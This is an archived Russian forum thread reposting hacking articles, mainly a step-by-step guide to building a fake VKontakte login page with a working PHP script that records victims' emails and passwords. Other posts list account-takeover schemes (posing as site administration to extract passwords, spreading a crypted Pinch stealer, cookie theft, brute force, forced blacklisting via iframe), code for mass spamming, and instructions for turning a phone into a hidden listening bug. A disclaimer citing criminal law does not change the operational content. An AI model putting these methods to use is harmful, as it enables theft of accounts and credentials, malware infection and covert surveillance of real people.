И тут я, почтенно поправив очки, должен важно заявить: читайте только хакер и мы покажем вам не два зла, но одно добро. К чёрту! Да не фига вы не знаете про GoogleOS, Bitdefender, Graphical Password, закупкам на eBay и Amazon, открытие правильного порно-портала и дзен-буддизме компьютерных технологий. Вы уже просто не замечаете той жизни, в которой живёте. Легко обвинять авторов, программистов, хакеров в том, что «их мышление им удобно», «они плохие, потому что плохие» и «давайте их всех казним, они нам надоели», но не в большей ли степени это соответствует вам? Не надо искать виноватых в том, что компьютеры стоят дорого, вирусы – гады, а писателям нечего писать. Вы сами своей пустотой и своим мышлением создали наш весёлый постмодернизм. Вот и живите со своими бесконечными необъятными компьютерными проблемами, которые никто не спешит решать. Гейтсу плевать. Хакерам тоже. Они не враги вашему мышлению, но и не друзья, скорее, иное измерение, до которого вам не допрыгнуть. Всё же эта статья написана именно для вас, пользователей бескрайнего рунета. Потому что кто-то должен покончить с этим мрачным киберпанком «лучших» и «худших»: страна у нас пока одна и интернет тоже, и я точно такой же пользователей продукцией, как и вы и уж тем более не всезнающий бог. И мне очень хочется узнать, чем же меня кормят.

Деймос Стренталл
---
я ее прочел и скопировал отседова:
(с) __tp://soc-engineer.ru/showthread.php?p=818#post818

0

26

Фейк на скорую руку

Автор статьи - nonamez с forum.antichat.ru

[iNtrO]

Делать было нечаго,дело было вечером....Собственно на первую мою статью (первую на античате), потянул меня тот факт, что в разделе купи/продай/обменя/кинь по крупному есть тема, в которой один хеккер продовал фейки аж по 10 вмз, да и часто просят создать тот или иной фейк...
Я же расскажу одной статьей как можно забацать универсальный фейк почти подо все, что угондо! Покажу на примере фейка вконтакте.

[SeaRchINg]

И так, 1 что нам нужно, так это выбрать жертворесурс и собрать всю нужную нам инфу,а нам нужна толька копия некоторых страниц.Идем на vkontakte.ru через Operu (!). Жмякаем кнопочку вход, попадаем на логин.пхп, ее и возьмем за индекс нашего фейка. Жмем в опере: Фаил-->Сохранить как-->В открывшимся диалоге под названием выбираем (по умолчанию там стоит Веб Архив....) "HTML Фаил с изображениями", и обезательно графу Имя Файла пишем index(или login.htm- в зависимости от страницы)

http://s52.radikal.ru/i136/0901/21/529fddcbba41.jpg

Далее вводим туда нереальные данные и попадаем на страницу, на которой написано

Код:
Такой почтовый адрес не зарегистрирован, либо пароль неверный.

Сохраняем ее точно так же, только вместо index пишем bad.

Далее вбиваем в Google.ru фразу Vkontakte.ru, жмем Дополнительные результаты с vkontakte.ru » и ищим что-то связанное с эрором контакта... На вторйо страницы я нашел VKontakte | Error (http://vkontakte.ru/blank.php?code=10)- запоминаем,нам понадобиться эта ссылка

Усе, все что нам надо для фейка от ресурса, у нас уже есть.

[CoDiNg]

Такс, теперь иследуем форму логина. Открываем наш index.html и ищем форму входа.

Код:
<form method="post" name="login" id="login" action="login.php">
 <input type="hidden" name="success_url" id="success_url" value="">
 <input type="hidden" name="fail_url" id="fail_url" value="">
 <input type="hidden" name="try_to_login" id="try_to_login" value="1">
  <table align="center" cellpadding=0 cellspacing=7 border=0 width="40%">
   <tr>
    <td width="100px">
     <span class="grey">Email:</span>
    </td>
    <td>
     <input class="inputText" type="text" name="email" value="" id="email" size="25" />
    <td>
   </tr>
   <tr>
    <td>
     <span class="grey">Пароль:</span>
    </td>
    <td>
     <input class="inputText" type="password" name="pass" value="" id="pass" size="25" />
    </td>
   </tr>
   
   <tr>
    <td>
     &nbsp;
    </td>
    <td>
     <input style="margin-top:1px; vertical-align: middle;" type="checkbox" name="expire" id="expire" value="1" /><small>Чужой компьютер</small>
    </td>
   </tr>
   <tr>
    <td>
     &nbsp;
    </td>
    <td>

Отсюда запоминаем 3 вещи:
1)

Код:
<form method="post" name="login" id="login" action="login.php">

2)

Код:
<input class="inputText" type="text" name="email" value="" id="email" size="25" />

3)

Код:
<input class="inputText" type="password" name="pass" value="" id="pass" size="25" />

Именно в этих 3 вещах заключаеться первая часть уникальности, на любой социалке или эмайле или еще где либо, везде форма входа(поля), будут в таком види (ну только название полей будит отличаться),к примеру у однокласников это

Код:
<input id="field_password" value="" style="width: 170px;" type="password" size="20" name="st.password">

Тоесть просто отличаеться название полей, элементами дизайна-но функция у всех одна и таже.

Теперь мы создаем пхп файл, и называем его к примеру login.php,его содержимое:

Код:
<?php
/*
#############
#by_NoNameZ#
###########
*/
$f=fopen("log.txt","at"); 
flock($f,2); 
if(preg_match("/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/i", $_POST['email'])&& !empty($_POST['password'])){
fputs($f, $_POST['email'].";".$_POST['password']." \n");
     header("Location: http://");
} else {
     header("Location: http://");
}
flock($f,3); 
fclose($f); 
?>

Собственно смотрим на скрипт, пару строчег, но это вполне нормальный фейк,его функционал:
Сохранение передаваемых переменных,их проверка,редирект в зависимости от проверки.

И так, теперь возвращаемся к тем 3 строчкам:
1)

Код:
<form method="post" name="login" id="login" action="login.php">

тут у нас все в порядки,имя нашего скрипта совподает с именем ихнего, нобывает что и не совпадет, тогда заменяем его или же переиминовываем наш.

2)

Код:
<input class="inputText" type="text" name="email" value="" id="email" size="25" />
Код:
<input class="inputText" type="password" name="pass" value="" id="pass" size="25" />

Отсюда нам нужно name="email" и name="pass"
Вставляем их в наш скрипт в нужное место

Код:
<?php
/*
#############
#by_NoNameZ#
###########
*/
$f=fopen("log.txt","at"); 
flock($f,2); 
if(preg_match("/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/i", $_POST['email'])&& !empty($_POST['pass'])){
fputs($f, $_POST['email'].";".$_POST['pass']." \n");
     header("Location: http://");
} else {
     header("Location: http://");
}
flock($f,3); 
fclose($f); 
?>

Кто не заметил, это $_POST['email'] и $_POST['pass']

Далее смотрим скрип, тут стаит функция IF ELSE, и прегматч, тоесть если поле эмайл соотвествует эмайлу(ника@мыло.ру, а не как водят ывпмдвгк), и поле пароль не пустое, то выполняеться первый редирект, если же эмаил не соответствует или поле пасс пустое, то на второй редирект. Из этого следует,что если челл ввел мыло и что-то похожее на пасс, то кидаем его на страницу с эрором http://vkontakte.ru/blank.php?code=10, а если ввел херню (вот тут нам и понадобилась копия страницы bad.html?когда мы вводили неверные данные), то кидаем его обратно, тоесть вписываем bad.htm.

Выглядит это так:

Код:
<?php
/*
#############
#by_NoNameZ#
###########
*/
$f=fopen("log.txt","at"); 
flock($f,2); 
if(preg_match("/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/i", $_POST['email'])&& !empty($_POST['pass'])){
fputs($f, $_POST['email'].";".$_POST['pass']." \n");
     header("Location: http://vkontakte.ru/blank.php?code=10");
} else {
     header("Location: bad.htm");
}
flock($f,3); 
fclose($f); 
?>

Сохраняем.Заливаем всю лабуду на сервер(login.php,index.htm+папка с файлами,bad.htm+папка с файлами),создаем файил log.txt(советую свое уникальное имя придумать. не забудьте в скрипте сменить),ставим на него chmod777.

3) небольшой апдейт...

Этот апдейт подойдет очень дл СИ,в корне на фтп создаем фаил .htaccess со следующим содержанием:

Код:
RewriteEngine On 
RewriteCond %{REQUEST_FILENAME} !-f 
RewriteCond %{REQUEST_URI} !index\.htm 
RewriteRule (.*) index.htm? [QSA]

ВНИМАНИЕ!!!

!index\.htm-на этот фаил ссылаеться редирект, если же у вас фейк допустим login.html. то соответственно вам нужно переиминовать индекс в логин.

Такс, данный фаил нам дает ссылку более качественно газлива, а именно:
вашфейк.ру/любой текст, тобишь зная ссылку структуру согдаваемого фейка, к примеру контакта, мы можем сделать так:

Код:
вашфейк.ру/photos.php?act=show&id=15884695_588954334&uid=359648756&self=6

и впарить это по аське)))согласитесь. менее заметен теперь фейк))

Вот и все

[THe eND]

Собственно что уникального, а то что вы можете зайти на на одноклассников, так же сохранить страницу,вписать переменные,заменить урлы( вот сразу даю http://odnoklassniki.ru/dk?st.cmd=error) и все, обсолютно так же зайти на майил.ру, сохранить переменные и заменить и все))) Единственное, что вам может понадобиться-это креативность, добустим сохранять не главную страницу, а страницу входа.Вы так же можете сделать любой форум, если вы допустим хотите получить акк(отправляете в пм

Код:
<a href="фейк">ссылка на тему</a>

, а в фейке указываете эту тему для редиректа.

Ну и в конце хочу добавить, если кто-то хочет купи акки социалок-стучити, цены актуальные)))

0

27

ВНИМАНИЕ
СООБЩЕНИЕ ИМПЕРСКОЙ ИНКВИЗИЦИИ

Прежде чем применять навыки взлома убедитесь в согласии владельца взламываемого ящика или сайта на Ваш эксперимент. Касается всех ресурсов в Ру-Зоне

УГОЛОВНЫЙ КОДЕКС РОССИЙСКОЙ ФЕДЕРАЦИИ
Статья 272. Неправомерный доступ к компьютерной информации
1. Неправомерный доступ к охраняемой законом компьютерной информации, то есть информации на машинном носителе, в электронно-вычислительной машине (ЭВМ), системе ЭВМ или их сети, если это деяние повлекло уничтожение, блокирование, модификацию либо копирование информации, нарушение работы ЭВМ, системы ЭВМ или их сети, -
наказывается штрафом в размере до двухсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период до восемнадцати месяцев, либо исправительными работами на срок от шести месяцев до одного года, либо лишением свободы на срок до двух лет.
2. То же деяние, совершенное группой лиц по предварительному сговору или организованной группой либо лицом с использованием своего служебного положения, а равно имеющим доступ к ЭВМ, системе ЭВМ или их сети, -
наказывается штрафом в размере от ста тысяч до трехсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период от одного года до двух лет, либо исправительными работами на срок от одного года до двух лет, либо арестом на срок от трех до шести месяцев, либо лишением свободы на срок до пяти лет.

dura lex...sed lex

0

28

Эх, надо бы это в первый пост добавить =).
От себя скажу, что товарищ Алексей прав - вся информация в данной теме предназначена только в целях ознакомления и предотвращения возможностей хакерских атак на ваш компьютер/е-мэйл. Не пытайтесь применять полученные знания о взломе на практике! Увижу - руки оторву! Ребята, давайте жить дружно (с).

0

29

Способы взлома аккаунтов vkontakte.ru

Автор статьи - ZiLiBoBa с forum.antichat.ru

INTRO

Статья написана для новичков и если 'гуру' начнут критиковать то я предупреждал(могот быть "оскробления" в вашь адресс)...Я любитель СИ но + я подобрал ешо некоторый интересный материал по етой теме...
Начинаем

1)Регистрируем аккаунт и переделываем его под тех.поддержку(в самом низу страницы).Далее пишем сообщение жертве:
Сообщение от Администрации.

Уважаемый\ая .

На наш сайт был нанесен удар хакерами и
некоторые базы пользователей пострадали.
Если вы хотите сохранить свой аккаунт,
то, пожалуйста, оставьте нам сообщение
с вашим email и паролем.В противном
случае ваш аккаунт будет удален безвозвратно.

Будьте внимательны, не попадайтесь на уловки мошенников!

С уважением Администрация vkontakte.ru

2)Регистрируем аккаунт противоположного пола, и просим мол попереписываться по emailам ,ну или что-то типо того, цель узнать email.Потом заходим в забыли пароль (например на майл ру или чьей фирме принадлежит домен)и пробуем взломать,если не получается то АККУРАТНО спрашиваем у жертвы.

3)Знакомимся и впихиваем пинча .Перед этим его нужно будет закриптовать, пабликовский криптор палится антитварями и чтобы этого недопустить пишем криптор сами или покупаем.

4)Делаем фейк страницы и через левую асю знакомимся с жертвой..ну и типо кидаешь ссылку чтбы посмотреть фотки…жертва будто захоит на свою страницу а пасс и email прилетают вам.(Самое главное URL сделать максимально похожий!!!)

5)Узнаем email(из выше перечисленных способов),регистрируемся на сайте типо na-s.ru и кидаем адрес картинки пользователю на мыло. Поздравляю Куки украдены.Скачиваем минибраузер или сами подставляем куки.И как всегда просим выслать пароль на мыло(это вконтакте).Только незабудьте удалить это сообщение.

6)Если вы азбираетесь в сайтостроении то можете сделать сайт напиханный пинчарой и т.п.Тоесть чтобы когда жертва перешла на сайт то троян скомуниздил пароль.

7)Брут для vkontakte.ru.Думаю описывать не стоит, всем и так понятно что это.

Небольшой + (собрано самое интересное)

Код:
Если у тебя много друзей и тебе каждый раз лень их отмечать на видео или фото то надо следовать инструкции
1)Вначале ты входишь в видео!
2)Нажимаешь отметить!
3)третий шаг там где написано http://www.vkontakte.ru/?????????ты всё удаляеш и вставляешь следующий текст!
4)java script:for(blabla=0;blabla<5000;blabla++){ var elem = document.getElementById('f'+blabla); if(elem == null) break; elem.onclick(); }
5)Удаляешь пробел между java script
6)Нажимаешь энтер и он отмечает сам
7)И пишем спасибо создателю>>http://vkontakte.ru/id20029416
8)Размести надпись которая написана после стрелочек у себя на стене(в контакте) буду очень благодарен
>>>>>>http://www.bj-chat.narod.ru от туда можно качать видео, музыку и просто сидеть в чате!!! делают видео и музыку на заказ!!!

Для просмотра закрытого профиля требуется:

Узнать ID пользователя. Делается это легко, наводим мышку на "Друзья ИМЯ". Копируем ссылку.
http://vkontakte.ru/friend.php?id=ЦИФОРКИ

ЦИФОРКИ после "id=" и есть ID профиля.
Копируем эти цифры и вставляем в нужные нам ссылки:
Пример :http://vkontakte.ru/friend.php?id="20029416"
Мы копируем то что указано в кавычках!!
Фотографии со мной:
http://vkontakte.ru/photos.php?act=user&id=ЦЫФОРКИ
Фотоальбомы:
http://vkontakte.ru/photos.php?id=ЦЫФОРКИ
Видеозаписи:
http://vkontakte.ru/video.php?id=ЦЫФОРКИ
Заметки:
http://vkontakte.ru/notes.php?id=ЦЫФОРКИ
Мнения о человеке:
http://vkontakte.ru/opinions.php?id=ЦЫФОРКИ

Для того чтобы быстро пригласить всех своих друзей в группу достаточно тока вставить текст в строку браузера(текст ниже)
javascript:function addall(){ var butt_all=” Выделить всех “;j=0;var div_s=document.getElementsByTagName(’div’);for(var i=0;i’+div_s[i].innerHTML;} }} }addall();

Женить себя на себе.
Фишка не особо полезная, но зато забавная. Для её использования лучше пользоваться браузером OPERA Заходите на страницу редактирования своего профиля: http://vkontakte.ru/profileEdit.php Выберайте семейное положение “Женат”. после этого открывайте исходный код страницы(в опере это ctrl+U). там находите html код выподающего списка и вконец вставляете себя: Я Затем жмете “Применить изменения” и на странице редактирования выбираете себя в списке и сохраняйте профиль. теперь вы женаты сами на себе))) Таким же способом можно менять год рождения, учебы, службы. А если поставить какойнибудь год рождения типа 11112008 то ваш возраст будет минус 1111000.
2. Легальный способ повышения рейтинга заполняя анкету. процентное соотношение:Фотография - 25% Личная информация (увлечения) - до 20%, хитрая зависимость от того, как заполнено Вуз - 5% Школа со всеми данными…. - 20% Карьера - 10% О себе: - 10% - пол - 2% - семейное положение - 2% - дата рождения (полностью) - 2% - родной город - 2% - политические взгляды - 1% - религиозные взгляды - 1%) Места - 10% (1 место - 1%, если до 10 штук) Контактная информация - 10% мобильный телефон - 4% ICQ - 4% домашний телефон - 2%)
3. Вставить какой-либо спец-символ (звёздочка, чердечка, пр.) нужно либоа) нажать комбинацию клавишь “alt” и какую-либо цифру с правой стороны клавиатуры! для сердечка нужна 3…! ))б) Пуск>Стандартные>Служебные>Таблица символов Там все символы и комбинации клавиш к ним. Например ® - Alt+0174 (Примечание: в этой таблице символов символов дофига, но копируются в контакт не все!, атолько те, у которых в правом нижнем углу таблицы написана комбинация клавиш)
Примечание #2:
ЧТОБЫ ПОЛУЧАЛОСЬ, НУЖНО ЧТОБЫ КЛАВИША NumLock БЫЛА ВКЛЮЧЕНА. Тогда все у всех получиться.
P.S. Для пользователей мак мака - соответственно вместо ALT используем OPTION =)
Также можно скопировать и вставить нужный вам символ отсюда:
+•В¦¬Х¦CНО™)®>•OOOOOO¦¦¦
¦¦¦¦¦¦¦•••0O?v
?$¦••0¦¦¦O•OOO¦¦56¦••
;90?¦+??????©¶?{ceIO’I?? + A
? ? ? ? ? ? ? ї ? С ? L ? ??
???¦“L?¦ОS§
AA6§6¦¦E••b“q{¦¦•0¦¦d d
4. Посмотреть историю изменения статуса любого пользователя. последние 10 изменений.
Зайдите на страницу пользователя. Адрес в браузерной строке выглядит так:
http://vkontakte.ru/profile.php?id=[ID пользователя]
и добавьте в конце строки:
&activityhistory=1
что бы получилось:
http://vkontakte.ru/profile.php?id=[ID пользователя]&activityhistory=1
и нажмите ENTER.
теперь вы можете видеть историю изменения.
5. Как пригласить сразу всех друзей в группу
1) Зайдите в "Пригласить в группу"
2) Скопируйте в адресную строку следующее :
java script:function addall(){var butt_all='[>>>Приглашаааем!<<<] '; j=0; var div_s=document.getElementsByTagName("div");for(var i=0;i 3) Уберите пробел между "java ( ) script" (с самого начала)
4) Нажмите "Enter"
Над списком с друзьями, перед "Пригласите Друзей" - появится надпись - "Приглашааааем", нажимайте на эту надпись и все друзья выделятся!
(надпись"Приглашааааем" под курсором не выделяеться, просто кликните по любой из букв) 4) Нажмите кнопку "Выслать приглашения"
6. Как пригласить всех друзей на встречу
1. Копируем "java script:for(var i = 0; i < 5000; i++) document.inviteFriends.elements[i].checked = true" без кавычек.
2. Вставляем в адресную строку браузера.
3. Удаляем пробел между java и script.
4. Жмём ENTER - выделятся все Ваши друзья.
5. Жмём пригласить


Мелкие пакости vkontakte

Для кого-то потребуется дельфи 6,7/ C/ php.. для отправки пакетов.
Так же можно использовать программу inetCrack, в которой уже реализован метод приёма и передачи TCP пакета.

Всё, что будет ниже описано, исключительно для новичков. Ну что, перейдём к делу.

1. Спам по личкам.

{маленький пример на дельфи}
--------------------------------------------------
Создаём форму и закидываем на неё ClientSocket\ServerSocket\Memo1\Memo2\Button1\Butt on2
Цитата
{создаём сервер}
procedure TForm1.FormCreate(Sender: TObject);
begin
ServerSocket1.Port:=1488;
ServerSocket1.Active:=true;
memo1.Clear;
memo2.Clear;
button1.Caption:='подкл.';
button2.Caption:='посылаем';
end;

{будем принимать данные с 8888 порта в memo1}
procedure TForm1.ServerSocket1ClientRead(Sender: TObject;
Socket: TCustomWinSocket);
begin
memo1.Lines.Text:=socket.ReceiveText;
end;

{активируем клиент}
procedure TForm1.Button1Click(Sender: TObject);
begin
ClientSocket1.Host:='vkontakte.ru';
ClientSocket1.Port:=80;
ClientSocket1.Active:=true;
end;

{посылаем данные}
procedure TForm1.Button2Click(Sender: TObject);
begin
ClientSocket1.Socket.SendText(memo1.Lines.Text);
end;

{ответ от vkontakte.ru будет в memo2}
procedure TForm1.ClientSocket1Read(Sender: TObject;
Socket: TCustomWinSocket);
begin
memo2.Lines.Text:=socket.ReceiveText;
end;

Заходим http://vkontakte.ru/mail.php?act=write, указываем тему и текст сообщения.
Далее настраиваем браузер через веб прокси 127.0.0.1:1488
Компилируем и запускаем проект, а в браузере тыкаем кнопку отправить.. в memo1 появится пакет, который посылает ваш браузер. {упрощённый вариант}
Нажимаем кнопку отправить, тем самым мы отправляем сообщение по указанному адресату.

Пример пакета:
Цитата
POST http://vkontakte.ru/mail.php HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)
Host: vkontakte.ru
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru,en;q=0.9
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Cookie: remixInformation=1; remixAdminsBar=0; remixforums=1; remixlang=0; remixGroupType=0; remixourEvents=1; remixRecentNews=1; remixfriends=1; remixopinions=1; remixfriendsOnline=1; remixastatus=1; remixvideos=0; remixnotes=1; remixfriendsCommon=1; remixlinksBar=1; remixaudios=1; remixpersonal=0; remixwall=1; remixmid=452418; remixemail=fuck%40mail.ru; remixpass=872486652hf34124; remixalbums=1; remixref=452418; remixchk=5; remixeducation=0; remixclosed_tabs=0; remixfilters=279; remixautobookmark=14
Cookie2: $Version=1
Proxy-Connection: close
Content-Length: 121
Content-Type: application/x-www-form-urlencoded

act=sent&misc=1&to_reply=0&to_ids%5B%5D=3116221&members_name=&to_id=
3116221&title=111111111&toFriends=1&message=222222222

Рассматриваем последнюю строку, "act=sent&misc=1&to_reply=0&to_ids%5B%5D=3116221&members_name=&to_id=
3116321&title=111111111&toFriends=1&message=222222222"

to_id=3116321&title=111111111&toFriends=1&message=222222222
Тут всё предельно просто, для того, что бы написать спамер, нужна смена последней строки и посылка пакета.
Так же не забывайте учитывать Content-Length: 121 - кол-во символов последней строки. По аналогии можно спамить и стены.
--------------------------------------------------

2. Автоматическая смена имя&фамилия&ник

Действуем так же.

Пример пакета:
Цитата
POST http://vkontakte.ru/settings.php HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)
Host: vkontakte.ru
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru,en;q=0.9
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Cookie: remixInformation=1; remixAdminsBar=0; remixforums=1; remixlang=0; remixGroupType=0; remixourEvents=1; remixRecentNews=1; remixfriends=1; remixopinions=1; remixfriendsOnline=1; remixastatus=1; remixvideos=0; remixnotes=1; remixfriendsCommon=1; remixlinksBar=1; remixaudios=1; remixpersonal=0; remixwall=1; remixmid=452418; remixemail=fuck%40mail.ru; remixpass=872486652hf34124; remixalbums=1; remixref=452418; remixchk=5; remixeducation=0; remixclosed_tabs=0; remixfilters=279; remixautobookmark=14
Cookie2: $Version=1
Proxy-Connection: close
Content-Length: 145
Content-Type: application/x-www-form-urlencoded

act=change_name&hash=7013d90741dh5711284841182&nickname=
Noctambulaar&subm=1&first_name=myfirstname&last_name=mylastname

Надеюсь у Вас получится написать автосмену, как у меня, рэндом nick\first\last каждую секунду. хD

3. Украшательства вашего клуба
В этом случае приведу html пример.

В сточке <input type="hidden" name="gid" id="gid" value="874628"> подставьте свой id клуба.

group.html:
group.html

Что я добавил?
Я изменил input на textarea, тем самым, в названии можно использовать перенос строки. {<br> or \n}

4. Меняем поля в своём профиле.
У себя я изменил поле Религия по примеру 3., все делается по аналогии, input заменяем на textarea.

5. Дата рождения.
В моём профиле дата рождения установлена 111111. Привожу html пример.
Заходим http://vkontakte.ru/profileEdit.php смотрим текст страницы, ищем <input type="hidden" name="hash" id="hash" value=" и заменяем всю строку на строку из html примера, который ниже

sploit.html
sploit.html

выбираем дату 31 Мая 66666 года.

По аналогии переноса строки можно надругаться над всем.

5. Закачка картинки вместо граффити.
{готовая реализация}
http://www.polus.com.ru/vkontakte.php
http://www.zilmar.com/viewpage.php?page_id=4

6. Чёрный список.
Хотите, что бы нужный человек добавил другого в черный список?
Посылаем человека на страницу с таким кодом.
black.html
Цитата
<iframe src=http://vkontakte.ru/settings.php?act=addToBlackList&id=1125629>
id конечно же меняем. По аналогии можно много что сделать.
group.html

Что я добавил?
Я изменил input на textarea, тем самым, в названии можно использовать перенос строки. {<br> or \n}

4. Меняем поля в своём профиле.
У себя я изменил поле Религия по примеру 3., все делается по аналогии, input заменяем на textarea.

5. Дата рождения.
В моём профиле дата рождения установлена 111111. Привожу html пример.
Заходим http://vkontakte.ru/profileEdit.php смотрим текст страницы, ищем <input type="hidden" name="hash" id="hash" value=" и заменяем всю строку на строку из html примера, который ниже

sploit.html
sploit.html

выбираем дату 31 Мая 66666 года.

По аналогии переноса строки можно надругаться над всем.

5. Закачка картинки вместо граффити.
{готовая реализация}
http://www.polus.com.ru/vkontakte.php
http://www.zilmar.com/viewpage.php?page_id=4

6. Чёрный список.
Хотите, что бы нужный человек добавил другого в черный список?
Посылаем человека на страницу с таким кодом.
black.html
Цитата
<iframe src=http://vkontakte.ru/settings.php?act=addToBlackList&id=1125629>
id конечно же меняем. По аналогии можно много что сделать.

Зы .Прошу сильно статью не критиковать!))
ZiLiBoBa antichat.ru

0

30

Жучок для прослушки своими руками

Автор статьи - Gen1rus с forum.antichat.ru

Не люблю я всяких вступлений, поэтому ближе к делу. В этой "статье" я хочу рассказать как сделать супер жучек для прослушки своими руками.

Для это нам потребуется:

1. Мобильный телефон
2. Умение пользоваться им))

Инструменты готовы, приступим...
Берем в наши умелые руки этот самый будущий жучок, т.е. мобильный телефон. Отключаем подсветку, звонок (+вибрацию), вобщем делаем так, чтобы с виду телефон не подавал признаков жизни (если телефон не жалко, можно немного потрескать панельку). Далее, включаем на телефоне функцию автоответ (например 5 секунд), думаю уже догадались для чего...

Ну вобщем всё готово, прячем его куда-нибудь около цветка, уходим, звоним, подслушиваем...  :D

0


Вы здесь » Горизонт событий » Архив тем » Введение в Интернет и безопасность в нем